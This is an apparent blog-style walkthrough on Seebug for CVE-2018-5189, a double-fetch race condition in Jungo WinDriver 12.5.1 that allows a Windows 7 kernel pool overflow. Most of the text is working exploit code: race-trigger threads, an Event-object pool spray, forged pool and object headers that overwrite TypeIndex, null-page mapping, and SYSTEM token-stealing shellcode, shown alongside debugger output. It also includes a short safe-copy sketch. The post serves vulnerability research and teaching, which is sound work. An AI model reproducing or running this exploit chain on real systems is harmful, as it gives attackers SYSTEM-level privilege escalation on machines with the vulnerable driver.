Seebug SSV:97083, posted by Root
Jan 16, 2018

CODE EXECUTION (CVE-2018-5189) WALKTHROUGH ON JUNGO WINDRIVER 12.5.1

INTRODUCTION

Windows kernel exploitation can be a daunting area to get into. There are plenty of helpful tutorials out there, and originally this post was going to add to that list. Instead, this is the story of how I found CVE-2018-5189, together with a complete walkthrough of the exploit development cycle.

The idea was to find a third-party driver that someone had already found a vulnerability in and work through developing an exploit for it. What actually happened was that we discovered a previously undisclosed vulnerability in the “patched” version of that driver. This post covers how we went from Windows kernel exploitation virgins to our first privilege escalation exploit, leveraging a race condition (a double fetch) to trigger a pool overflow. We won’t go into every aspect of the exploit, as some topics have been done to death (such as trivial pool spraying); in these cases, we’ll link to the references we found useful.

The product in question is Jungo’s WinDriver version 12.5.1 [1]. This target was chosen after we spotted a vulnerability in the previous version, disclosed by Steven Seeley [2]; the plan was to step through the exploit he’d written and learn from it. After running through that exploit, we downloaded the patched version and started looking for anything new.

The setup used was a Windows 7 x86 VM with kernel debugging enabled.

STATIC ANALYSIS

When looking for vulnerabilities in device drivers, the first place we would generally look is the IOCTL handler as this is where we can trace user input. As we can see here, it’s a bit of a monster:

One of the areas that caught our attention was the following group of IOCTLs, which all call the same function:

Reversing sub_4199D8 gives the following insight.

The first basic block takes our user buffer and uses a value at offset 0x34 as the argument to another function:

Sub_4082D4 takes the value it’s passed and does some manipulation of that value before passing it off to ExAllocatePoolWithTag.

The astute reader may notice that there’s an integer overflow in this function. We tried finding some way of exploiting it but in the end, settled with exploiting the next issue.

A little later back in sub_4199D8 the following copying loop occurs:

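The logic here is quite simple (and slightly flawed). Starting at user_buff+0x38 and pool_buff+0x3C, it copies 10 bytes at a time. Notice, however, that the loop guard compares the counter (eax) with the user-defined size (ebx+0x34), which is read from the user buffer again on every iteration rather than captured once when the pool buffer was allocated. This is a classic double fetch: if another thread raises the size while the loop is running, the copy runs past the end of the pool buffer. It is slightly tricky to win, since the size is re-read over and over.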
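
The disassembly is not reproduced here, so the following is only a minimal C sketch of the pattern this paragraph describes, not the driver's actual code. The function names, the RECORD_SIZE constant and the dst_len parameter are illustrative assumptions. The first function re-reads the record count from shared memory on every pass of the loop guard (the double fetch), while the second reads it once and validates it before copying.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RECORD_SIZE 10u /* bytes copied per iteration, as described above */

/*
 * Vulnerable shape: *count lives in memory another thread can write, and it
 * is fetched again on every evaluation of the loop guard. If it grows after
 * dst was sized, the copy runs past the end of dst.
 */
static size_t copy_double_fetch(uint8_t *dst, const uint8_t *src,
                                const volatile uint32_t *count)
{
    size_t i = 0;
    while (i < *count) { /* fresh fetch on every iteration */
        memcpy(dst + i * RECORD_SIZE, src + i * RECORD_SIZE, RECORD_SIZE);
        i++;
    }
    return i * RECORD_SIZE; /* bytes written */
}

/*
 * Safer shape: fetch the count once into a local, check it against the
 * destination size, and only then copy. Returns 0 if the data would not fit.
 */
static size_t copy_single_fetch(uint8_t *dst, size_t dst_len,
                                const uint8_t *src,
                                const volatile uint32_t *count)
{
    uint32_t n = *count; /* the only fetch */
    if ((size_t)n > dst_len / RECORD_SIZE)
        return 0;
    for (size_t i = 0; i < n; i++)
        memcpy(dst + i * RECORD_SIZE, src + i * RECORD_SIZE, RECORD_SIZE);
    return (size_t)n * RECORD_SIZE;
}
```

With a stable count the two functions behave identically; they only differ when a second thread changes the count mid-copy, which is the window the rest of this post exploits.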

PATH TO EXPLOITATION

So we have a race condition that should allow us to overflow a pool buffer that has a size that we roughly control. This is generally a pretty good situation to be in. To exploit this issue we need to take the following steps:

  • Understand how we can trigger the vulnerability with threads.
  • Understand how we can manipulate pool pages to control the overflow.
  • Understand how this manipulation can lead to code execution.
  • Finally, find some way of checking our exploit has worked so that we can break out of the race.

This is usually a good way to approach exploit development: start with a list of problems and find solutions for each in turn. To begin, we should develop a proof of concept that causes a crash, allowing us to debug the kernel.

Consider the following situation: we have two threads running on separate cores, both of which share access to the same user buffer that will be supplied to the driver. The first thread continually makes calls to the driver’s IOCTL interface, whilst the second continually manipulates the size at user_buff+0x34.

The second function is extremely simple:

/*
* Continually flip the size
* @Param user_size - a pointer to the user defined size
*/
DWORD WINAPI flip_thread(LPVOID user_size)
{
    while (TRUE)
    {
        //volatile so the compiler performs the write on every iteration
        *(volatile ULONG *)(user_size) ^= 0xff;
    }
    return 0;
}

All we do here is flip the value from whatever it was when it was passed to the function by xoring it with 0xff.

The next function is also pretty straightforward:

DWORD WINAPI ioctl_thread(LPVOID user_buff)
{
    char out_buff[40];
    DWORD bytes_returned;

    HANDLE hdevice = CreateFile(device,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        0
    );

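    if (hdevice == INVALID_HANDLE_VALUE)
    {
        printf("[x] Couldn't open device\n");
        return 1; //nothing to send the IOCTL to
    }

    DeviceIoControl(hdevice,
        0x95382623,
        user_buff,
        0x1000,
        out_buff,
        40,
        &bytes_returned,
        0);

    CloseHandle(hdevice); //this thread is spawned in a loop, so don't leak the handle
    return 0;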
}

We simply open a handle to the device using CreateFile, and then trigger a call to the vulnerable function through DeviceIoControl. Note that the user_buff parameter is shared between both threads.

With both of our functions defined, we now need a way of executing them on separate cores. Windows provides a few nice functions for this: CreateThread, SetThreadPriority, SetThreadAffinityMask and ResumeThread. Putting it all together, we get the following:

int main()
{
    HANDLE h_flip_thread;
    HANDLE h_ioctl_thread;
    DWORD mask = 0;
    char *user_buff;
    
    user_buff = (char *)VirtualAlloc(NULL,
        0x1000,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_NOCACHE | PAGE_READWRITE);

    if (user_buff == NULL)
    {
        printf("[x] Couldn't allocate memory for buffer\n");
        return -1;
    }
    memset(user_buff, 0x41, 0x1000);

    *(ULONG *)(user_buff + 0x34) = 0x00000041; //set the size initially to 0x41

    /*
    * Create a suspended thread for flipping, passing in a pointer to the size at user_buff+0x34.
    * Set its priority to highest.
    * Set its affinity mask so that it runs on a particular core. The mask is a bit field
    * (bit 0 = first core, bit 1 = second core); a mask of 0 is rejected by the API.
    */
    
    h_flip_thread = CreateThread(NULL, 0, flip_thread, user_buff + 0x34, CREATE_SUSPENDED, 0);
    SetThreadPriority(h_flip_thread, THREAD_PRIORITY_HIGHEST);
    SetThreadAffinityMask(h_flip_thread, 2); //second core; the ioctl thread uses mask 1 (first core)
    ResumeThread(h_flip_thread);
    printf("[+] Starting race...\n");

    while (TRUE)
    {
        h_ioctl_thread = CreateThread(NULL, 0, ioctl_thread, user_buff, CREATE_SUSPENDED, 0);
        SetThreadPriority(h_ioctl_thread, THREAD_PRIORITY_HIGHEST);
        SetThreadAffinityMask(h_ioctl_thread, 1); //first core
        
        ResumeThread(h_ioctl_thread);
        
        WaitForSingleObject(h_ioctl_thread, INFINITE);
        CloseHandle(h_ioctl_thread); //release the finished thread's handle
    }

    return 0;
}

The goal here is to start two concurrent threads such that, while one thread is manipulating the user-supplied size, the other is executing the vulnerable IOCTL. The aim is to consistently reach a state where the value at user_buff+0x34 is larger than it was when it was used to allocate the pool buffer. At first, I assumed this would be extremely difficult because the value is fetched from user space on every iteration. In reality, the above code should cause a bug check (BSOD) after a second or two.

With WinDbg attached for kernel debugging [6], we get the following crash:

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 86ff3488, The pool entry we were looking for within the page.
Arg3: 86ff3758, The next pool entry.
Arg4: 085a002c, (reserved)

Let’s look at the pool to see what’s happened. To do this, we make use of a WinDbg plugin called poolinfo, which gives the following pool information:

0: kd> !poolpage 86ff3488
walking pool page @ 86ff3000
Addr      A/F   BlockSize     PreviousSize  PoolIndex PoolType Tag
-------------------------------------------------------------------
86ff3000: InUse 02E8 (05D)    0000 (000)           00       02 Thr.
86ff32e8: InUse 0040 (008)    02E8 (05D)           00       02 SeTl
86ff3328: Free  0160 (02C)    0040 (008)           00       00 ALP.
*86ff3488: Free  02D0 (05A)    0160 (02C)           00       04 RDW.
86ff3758: Free  0000 (000)    0000 (000)           00       00 ....

Notice how the free block after the driver’s buffer has a strange header. Everything has been nulled out, which is not correct even for a free block. Looking at this buffer reveals that our user-controlled data ends just before this pool header:

0: kd> dd 86ff3758-8
86ff3750  41414141 00004141 00000000 00000000 -- pool header
86ff3760  00000000 00000000 00000000 00000000
86ff3770  00000000 00000000 00000000 00000000
86ff3780  00000000 00000000 00000000 00000000
86ff3790  00000000 00000000 00000000 00000000
86ff37a0  00000000 00000000 00000000 00000000
86ff37b0  00000000 00000000 00000000 00000000
86ff37c0  00000000 00000000 00000000 00000000

It took a bit of time to figure this out, but essentially the copy loop is exiting early because of the constant flipping. For example, we overflow by 4 bytes, but on the next check the value has been flipped back to the original size, breaking us out of the loop prematurely. This isn’t particularly bad; it just makes it harder to demonstrate a proof of concept. To get around it, we have to make sure that at whatever stage the loop exits, valid data is being written to the next pool buffer (i.e. a correct pool header).
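
To see why the overflow can stop short, it helps to model the loop guard as a sequence of observed size values. The sketch below is a user-mode simulation only, not driver code: records_copied, records_overflowed and the observed array are hypothetical names, and each array entry stands for the value the guard happens to read on that iteration.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Model of the copy loop's guard. observed[i] is the size value the guard
 * reads on iteration i (the flipping thread decides what that is). The loop
 * stops the first time the counter is no longer below the observed size,
 * or when the model runs out of observations.
 */
static size_t records_copied(const uint32_t *observed, size_t n_observed)
{
    size_t i = 0;
    while (i < n_observed && i < observed[i])
        i++;
    return i;
}

/* Number of records that land beyond a buffer sized for alloc_count records. */
static size_t records_overflowed(size_t copied, uint32_t alloc_count)
{
    return copied > alloc_count ? copied - alloc_count : 0;
}
```

For example, with a buffer sized for 4 records and a guard that reads 8 five times and then reads 4, the loop copies 5 records and stops: one record of overflow rather than the four the larger size would allow. This is why every prefix of the overflowing data has to leave the next chunk in a valid state.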

For now, we sort of have a working proof of concept. We know we can overflow the pool header of the next object, so we need some way of controlling that object. The topic of pool spraying has been covered extensively online, and we won’t go into the nitty-gritty details here; a good reference I used was http://trackwatch.com/windows-kernel-pool-spraying/.

There are, however, specifics for this exploit that are important. To start with, remember that we have control over the size of the allocation: the size we pass becomes (size - 1) * 0xa + 0x48. The basic principles of pool spraying follow this pattern:

  • Repeatedly create some objects a large number of times.
  • Free an exact number of sequential objects in random spots to create holes of specific sizes.
  • Trigger a call to the vulnerable driver where the pool allocation should fill one of the holes we created, meaning we know the object that will be located after it in memory.

After some trial and error, we decided to use the Event object with a TypeIndex overwrite. The following function sprays the kernel pool with a large number of Event objects, then frees runs of 14 adjacent objects at regular intervals. Each Event chunk is 0x40 bytes, so each hole is exactly 0x380 bytes (14 * 0x40).

void spray_pool(HANDLE handle_arr[])
{
    //create SPRAY_SIZE event objects filling up the pool
    for (int i = 0; i < SPRAY_SIZE; i++)
    {
        handle_arr[i] = CreateEvent(NULL, 0, NULL, L"");
    }

    //create holes in the pool of size 0x380
    for (int i = 0; i < SPRAY_SIZE; i+=50)
    {
        for (int j = 0; j < 14 && j + i < SPRAY_SIZE; j++)
        {
            CloseHandle(handle_arr[j + i]);
        }
    }
}
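
The numbers in spray_pool can be checked with a little arithmetic. The sketch below assumes the 0x40-byte Event chunk size seen in the pool dumps in this post; the constant and function names are illustrative, and the stride of 50 and run of 14 are taken from the loop above.

```c
#include <stdbool.h>
#include <stddef.h>

#define EVENT_CHUNK_SIZE 0x40u /* Event chunk size incl. pool header (from the dumps) */
#define HOLE_STRIDE      50u   /* a new hole starts every 50 handles */
#define HOLE_RUN         14u   /* 14 consecutive handles are closed per hole */

/* Size in bytes of the hole left by closing HOLE_RUN adjacent events. */
static size_t hole_size(void)
{
    return (size_t)HOLE_RUN * EVENT_CHUNK_SIZE;
}

/* True if spray_pool would close the handle at this index. */
static bool is_freed(size_t index)
{
    return index % HOLE_STRIDE < HOLE_RUN;
}

/* Number of holes started for a given spray size. */
static size_t hole_count(size_t spray_size)
{
    return (spray_size + HOLE_STRIDE - 1) / HOLE_STRIDE;
}
```

A hole is only a single 0x380-byte free chunk if the 14 events were allocated back to back, which a large spray makes likely but does not guarantee.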

We add a call to this function just before entering the while loop in main and get another crash. Inspecting the pool page that caused the crash, we find an allocated buffer exactly where we want it:

*** Fatal System Error: 0x00000019
(0x00000020,0x861306C0,0x86130A40,0x08700008)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!RtlpBreakWithStatusInstruction:
82ab5a38 cc int 3
0: kd> !poolpage 0x861306C0
walking pool page @ 86130000
Addr A/F BlockSize PreviousSize PoolIndex PoolType Tag
-------------------------------------------------------------------
86130000: InUse 0040 (008) 0000 (000) 00 02 Eve.
86130040: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130080: InUse 0040 (008) 0040 (008) 00 02 Eve.
861300c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130100: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130140: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130180: InUse 0040 (008) 0040 (008) 00 02 Eve.
861301c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130200: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130240: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130280: InUse 0040 (008) 0040 (008) 00 02 Eve.
861302c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130300: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130340: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130380: InUse 0040 (008) 0040 (008) 00 02 Eve.
861303c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130400: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130440: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130480: InUse 0040 (008) 0040 (008) 00 02 Eve.
861304c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130500: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130540: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130580: InUse 0040 (008) 0040 (008) 00 02 Eve.
861305c0: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130600: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130640: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130680: InUse 0040 (008) 0040 (008) 00 02 Eve.
*861306c0: Free 0380 (070) 0040 (008) 00 04 RDW. --- here
86130a40: InUse 0040 (008) 0000 (000) 00 02 Eve.
86130a80: InUse 0040 (008) 0040 (008) 00 02 Eve.
86130ac0: InUse 0040 (008) 0040 (008) 00 02 Eve.

This now means that we have full control over the next object that we intend to corrupt. We have now solved our first two problems, with the next being how we manipulate the Event object to cause code execution.

As previously mentioned, we are using the TypeIndex overwrite method. There are other ways to exploit this issue, and Tarjei Mandt’s paper provides an extremely good reference for all of them [3]. If we look at the structure of an Event object, we gain a bit of insight as to where to go:

kd> dt nt!_POOL_HEADER  8514fac0
+0x000 PreviousSize     : 0y010001100 (0x8c)
+0x000 PoolIndex        : 0y0000000 (0)
+0x002 BlockSize        : 0y000001000 (0x8)
+0x002 PoolType         : 0y0000010 (0x2)
+0x000 Ulong1           : 0x408008c  --- here
+0x004 PoolTag          : 0xee657645  -- here 
+0x004 AllocatorBackTraceIndex : 0x7645 
+0x006 PoolTagHash : 0xee65 

kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 8545f8c0+8 ;+8 to skip past pool header
+0x000 PagedPoolCharge  : 0
+0x004 NonPagedPoolCharge : 0x40
+0x008 SecurityDescriptorCharge : 0
+0x00c SecurityDescriptorQuotaBlock : (null)

kd> dt nt!_OBJECT_HEADER 8545f8c0+8+10 ;skip past pool header and Quota info
+0x000 PointerCount : 0n1
+0x004 HandleCount : 0n1
+0x004 NextToFree : 0x00000001 Void
+0x008 Lock : _EX_PUSH_LOCK
+0x00c TypeIndex : 0xc ''
+0x00d TraceFlags : 0 ''
+0x00e InfoMask : 0x8 ''
+0x00f Flags : 0 ''
+0x010 ObjectCreateInfo : 0x867b3940 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : 0x867b3940 Void
+0x014 SecurityDescriptor : (null)
+0x018 Body : _QUAD

There are a few values here that we need to keep to stop us from blue-screening. We need to set the PreviousSize value to 0x380 (the size of the RDW pool buffer) and keep all of the other values except the TypeIndex. The TypeIndex is an index into an array of pointers that describes the type of the chunk [4]:

1: kd> dd nt!ObTypeIndexTable
82b7dee0  00000000 bad0b0b0 84b43360 84b43298
82b7def0  84b4af78 84b4ad48 84b4ac08 84b4ab40
82b7df00  84b4aa78 84b4a9b0 84b4a8e8 84b4a7e8
82b7df10  84c131d0 84bf7900 84bf7838 84bf7770
82b7df20  84c0f9c8 84c0f900 84c0f838 84c039c8
82b7df30  84c03900 84c03838 84bef9c8 84bef900
82b7df40  84bef838 84bcb5e0 84bcb518 84bcb450
82b7df50  84bc3c90 84bc34f0 84bc3428 84c0df78

If we overwrite the TypeIndex to 0 then the object will attempt to look for the corresponding OBJECT_TYPE information in the null page.

0: kd> dt nt!_OBJECT_TYPE 86eb7000 .
+0x000 TypeList         :  [ 0x80000 - 0xee657645 ]
+0x000 Flink            : 0x00080000 _LIST_ENTRY
+0x004 Blink            : 0xee657645 _LIST_ENTRY
+0x008 Name             :  "瀈蛫倈蔔???"
+0x000 Length           : 0x8008
+0x002 MaximumLength    : 0x86ea
+0x004 ReadVirtual: 82b70938 not properly sign extended
Buffer           : 0x82b70938  "瀈蛫倈蔔???"
+0x010 DefaultObject    :
+0x014 Index            : 0 ''
+0x018 TotalNumberOfObjects : 0
+0x01c TotalNumberOfHandles : 0
+0x020 HighWaterNumberOfObjects : 0
+0x024 HighWaterNumberOfHandles : 0x80001
+0x028 TypeInfo         :
<…Snip…>
+0x00c GenericMapping   : _GENERIC_MAPPING
+0x01c ValidAccessMask  : 0xee657645
+0x020 RetainAccess     : 0
+0x024 PoolType         : 0x40 (No matching name)
+0x028 DefaultPagedPoolCharge : 0
+0x02c DefaultNonPagedPoolCharge : 0
+0x030 DumpProcedure    : 0x00000001        void  +1
+0x034 OpenProcedure    : 0x00000001        long  +1
+0x038 CloseProcedure   : (null)
+0x03c DeleteProcedure  : 0x0008000c        void  +8000c
+0x040 ParseProcedure   : 0x86dd0d80        long  +ffffffff86dd0d80
+0x044 SecurityProcedure : (null)
+0x048 QueryNameProcedure : 0x00040001        long  +40001
+0x04c OkayToCloseProcedure : (null)
<…Snip…>

Remember that we are using Windows 7 here, so we can map the null page and create our own OkayToCloseProcedure. The first thing we need to do is change our user space buffer so it contains the correct values:

//pool header block
*(ULONG *)(user_buff + 0x374) = 0x04080070; //ULONG1
*(ULONG *)(user_buff + 0x378) = 0xee657645;//PoolTag

//QuotaInfo block
*(ULONG *)(user_buff + 0x37c) = 0x00000000; //PagedPoolCharge
*(ULONG *)(user_buff + 0x380) = 0x00000040; //NonPagedPoolCharge
*(ULONG *)(user_buff + 0x384) = 0x00000000; //SecurityDescriptorCharge
*(ULONG *)(user_buff + 0x388) = 0x00000000; //SecurityDescriptorQuotaBlock

//Event header block
*(ULONG *)(user_buff + 0x38c) = 0x00000001; //PointerCount
*(ULONG *)(user_buff + 0x390) = 0x00000001; //HandleCount
*(ULONG *)(user_buff + 0x394) = 0x00000000; //NextToFree
*(ULONG *)(user_buff + 0x398) = 0x00080000; //TypeIndex <--- NULL POINTER
*(ULONG *)(user_buff + 0x39c) = 0x867b3940; //ObjectCreateInfo
*(ULONG *)(user_buff + 0x400) = 0x00000000;
*(ULONG *)(user_buff + 0x404) = 0x867b3940; //QuotaBlockCharged
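
The ULONG1 value written at user_buff+0x374 can be sanity-checked by unpacking it. The sketch below assumes the x86 _POOL_HEADER bit layout shown in the dt output earlier (9-bit PreviousSize, 7-bit PoolIndex, 9-bit BlockSize, 7-bit PoolType, with sizes stored in 8-byte units); the struct and function names are made up for illustration.

```c
#include <stdint.h>

#define POOL_GRANULARITY 8u /* x86 pool sizes are stored in 8-byte units */

struct pool_header_fields {
    uint32_t previous_size; /* in bytes */
    uint32_t pool_index;
    uint32_t block_size;    /* in bytes */
    uint32_t pool_type;
};

/* Split the first dword of an x86 pool header into its four bit fields. */
static struct pool_header_fields unpack_ulong1(uint32_t ulong1)
{
    struct pool_header_fields f;
    f.previous_size = (ulong1 & 0x1ffu) * POOL_GRANULARITY;
    f.pool_index    = (ulong1 >> 9) & 0x7fu;
    f.block_size    = ((ulong1 >> 16) & 0x1ffu) * POOL_GRANULARITY;
    f.pool_type     = (ulong1 >> 25) & 0x7fu;
    return f;
}

/* Inverse of unpack_ulong1: rebuild the dword from byte sizes and indices. */
static uint32_t pack_ulong1(struct pool_header_fields f)
{
    return ((f.previous_size / POOL_GRANULARITY) & 0x1ffu)
         | ((f.pool_index & 0x7fu) << 9)
         | (((f.block_size / POOL_GRANULARITY) & 0x1ffu) << 16)
         | ((f.pool_type & 0x7fu) << 25);
}
```

Unpacking 0x04080070 gives a PreviousSize of 0x380 bytes, a BlockSize of 0x40 bytes and a PoolType of 2, which is the original Event header with only PreviousSize changed to match the 0x380-byte RDW chunk in front of it.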

To control this overflow we also need to figure out what to flip the size value from and to. We have a buffer that is 0x378 bytes (0x380 with the 8-byte pool header), and we only want to overflow the next Event object. This gives us a requirement of a 0x40-byte overflow: 0x378 + 0x40 = 0x3b8. Remembering the manipulation applied when the pool is allocated, and ignoring the -1 term, (0x3b8 - 0x48) / 0x0a = 0x58. Finally, to flip the value between 0x52 and 0x58 we xor it with 10 (0x0a), since 0x52 ^ 0x0a = 0x58.
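
The arithmetic in this paragraph can be checked with a few lines of C. This is a sketch under the formula quoted earlier, (size - 1) * 0xa + 0x48; alloc_bytes, chunk_bytes and flip_size are hypothetical helper names, and the round-up to 8 bytes plus the 8-byte header are assumptions based on the x86 pool layout seen in the dumps.

```c
#include <stdint.h>

/* Bytes the driver requests for a given user-supplied size (formula from the text). */
static uint32_t alloc_bytes(uint32_t size)
{
    return (size - 1u) * 0xau + 0x48u;
}

/* Assumed resulting pool chunk: request rounded up to 8 bytes, plus the 8-byte header. */
static uint32_t chunk_bytes(uint32_t size)
{
    return ((alloc_bytes(size) + 7u) & ~7u) + 8u;
}

/* What the flipping thread does to the size on each pass. */
static uint32_t flip_size(uint32_t size)
{
    return size ^ 0x0au;
}
```

Under these assumptions a size of 0x52 requests 0x372 bytes, which lands in a 0x380-byte chunk and so fits the holes made by the spray. Flipping gives 0x58 and flipping again returns 0x52. The two sizes differ by six 10-byte records (0x3c bytes), which is close to the 0x40 bytes of the neighbouring Event chunk that the paragraph aims for.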

We then need to free the corrupted object, which we can do by simply closing all of the open handles. This gives us the following bug check:

Access violation - code c0000005 (!!! second chance !!!)
nt!MmInitializeProcessAddressSpace+0xc6:
82c5e520 837b7400        cmp     dword ptr [ebx+74h],0
0: kd> r
eax=c6239b40 ebx=00000000 ecx=00000000 edx=872aab58 esi=872aab58 edi=84c3c498
eip=82c5e520 esp=be363ba0 ebp=be363bdc iopl=0         nv up ei ng nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010282
nt!MmInitializeProcessAddressSpace+0xc6:
82c5e520 837b7400        cmp     dword ptr [ebx+74h],0 ds:0023:00000074=????????

This looks a bit odd at first glance: ebx is null, and the kernel is reading a value at 0x74. If we look at edx, we see it is the Event object directly after the overflown buffer:

872aa7c0: Free  0380 (070)    0040 (008)           00       00 RDW.
*872aab40: InUse 0040 (008)    0380 (070)           00       02 Eve.
872aab80: Free  0040 (008)    0040 (008)           00       04 Eve.

0: kd> dd 872aab40
872aab40 04080070 ee657645 00000000 00000040
872aab50 00000000 00000000 00000001 00000001
872aab60 00000000 00080000 867b3940 00000000
872aab70 00000000 00000000 872aab78 872aab78

Notice that the TypeIndex has been successfully overwritten, which has caused the kernel to look for an OkayToCloseProcedure at 0x74. At this point we are very close. The next stage involves mapping the null page and placing there a pointer to a function we want to execute (in kernel mode). The following function takes care of this for us:

BOOL map_null_page()
{
    /* Begin NULL page map */
    HMODULE hmodule = LoadLibraryA("ntdll.dll");
    if (hmodule == NULL) //LoadLibraryA returns NULL on failure, not INVALID_HANDLE_VALUE
    {
        printf("[x] Couldn't get handle to ntdll.dll\n");
        return FALSE;
    }
    PNtAllocateVirtualMemory AllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hmodule, "NtAllocateVirtualMemory");
    if (AllocateVirtualMemory == NULL)
    {
        printf("[x] Couldn't get address of NtAllocateVirtualMemory\n");
        return FALSE;
    }
    SIZE_T size = 0x1000;
    PVOID address = (PVOID)0x1;
    NTSTATUS allocStatus = AllocateVirtualMemory(GetCurrentProcess(),
        &address,
        0,
        &size,
        MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
        PAGE_EXECUTE_READWRITE);
    if (allocStatus != 0)
    {
        printf("[x] Error mapping null page\n");
        return FALSE;
    }
    printf("[+] Mapped null page\n");
    return TRUE;
}

We then put 0x41414141 at offset 0x74, which should cause an access violation, giving us a clear indication that we can control eip:

************* Symbol Path validation summary**************
Response                         Time (ms)     Location
Deferred                                       SRV*C:\symbols*http://msdl.microsoft.com/download/symbols
Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???
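
The 0x74 offset is not arbitrary: in the _OBJECT_TYPE dump earlier, TypeInfo sits at +0x28 and OkayToCloseProcedure at +0x4c inside it, and 0x28 + 0x4c = 0x74. The sketch below models the mapped null page as an ordinary byte array so that it can run anywhere; plant_handler, read_handler and the macro names are illustrative, and a 32-bit pointer width is assumed to match the x86 target.

```c
#include <stdint.h>
#include <string.h>

#define TYPEINFO_OFFSET    0x28u /* _OBJECT_TYPE.TypeInfo, from the dump */
#define OKAYTOCLOSE_OFFSET 0x4cu /* TypeInfo.OkayToCloseProcedure, from the dump */
#define HANDLER_OFFSET     (TYPEINFO_OFFSET + OKAYTOCLOSE_OFFSET)

/* Store a 32-bit function pointer where the kernel will look for it. */
static void plant_handler(uint8_t *page, uint32_t handler)
{
    memcpy(page + HANDLER_OFFSET, &handler, sizeof handler);
}

/* Read back the pointer that a call through [page + 0x74] would use. */
static uint32_t read_handler(const uint8_t *page)
{
    uint32_t handler;
    memcpy(&handler, page + HANDLER_OFFSET, sizeof handler);
    return handler;
}
```

In the real exploit the page is the one mapped at address 0 by map_null_page, and the planted value is first 0x41414141 and later the address of the shellcode function.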

Now that we know how to control code execution, we need to find some way of escalating our privileges and returning to userland without crashing. The standard way of doing this is to use token stealing shellcode to steal a SYSTEM token; an excellent post by Sam Brown covers this topic well [5]. The one thing to note here is that we must take into account how many arguments were pushed onto the stack and clean them up when we return.

We can see here that ObpQueryNameString pushes 16 bytes onto the stack before calling our shellcode (ebx+0x74):

nt!ObpQueryNameString+0x433:
82c60555 ff7518          push    dword ptr [ebp+18h]
82c60558 ff7514          push    dword ptr [ebp+14h]
82c6055b ff74241c        push    dword ptr [esp+1Ch]
82c6055f ff7510          push    dword ptr [ebp+10h]
82c60562 ff5374          call    dword ptr [ebx+74h]

For a while, we kept getting blue screens even with a ret 0x10 at the end of the shellcode. The solution was to declare the function using __declspec(naked), which tells the compiler not to generate a prologue or epilogue for the function (exactly what we need). The (only slightly modified) code is shown here:

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET    0x124    // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET   0x050    // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET        0x0B4    // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET      0x0B8    // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET      0x0F8    // nt!_EPROCESS.Token
#define SYSTEM_PID        0x004    // SYSTEM Process PID

/*
* The caller pushes 4 arguments (0x10 bytes) and expects the callee to pop them
* (stdcall-style cleanup), hence the ret 0x10.
*/
__declspec(naked) VOID TokenStealingShellcode() {
    __asm {
        ; initialize
        xor eax, eax; Zero eax so the fs-relative read below uses a known offset
        mov eax, fs:[eax + KTHREAD_OFFSET]; Get nt!_KPCR.PcrbData.CurrentThread
        mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process

        mov ecx, eax; Copy current _EPROCESS structure

        mov ebx, [eax + TOKEN_OFFSET]; Copy current nt!_EPROCESS.Token
        mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM Process PID = 0x4

        ; begin system token search loop
        SearchSystemPID :
            mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp [eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

        mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
        mov [ecx + TOKEN_OFFSET], edx; Copy nt!_EPROCESS.Token of SYSTEM to current process

        End :
            ret 0x10; pop the 4 pushed arguments (callee cleanup)

    }
}

Setting an int 3 breakpoint at the start of the shellcode is sometimes a nice way to check it’s being hit. With all of this together, we end up hitting it:

Break instruction exception - code 80000003 (first chance)
00f61790 cc              int     3
0: kd> kb
# ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 b7827b88 82c60565 85407d28 857bef30 0001c34c 0xf61790
01 b7827bdc 82c6043f bdd0fc48 c5fa0698 85407d28 nt!ObpQueryNameString+0x443
<…Snip…>

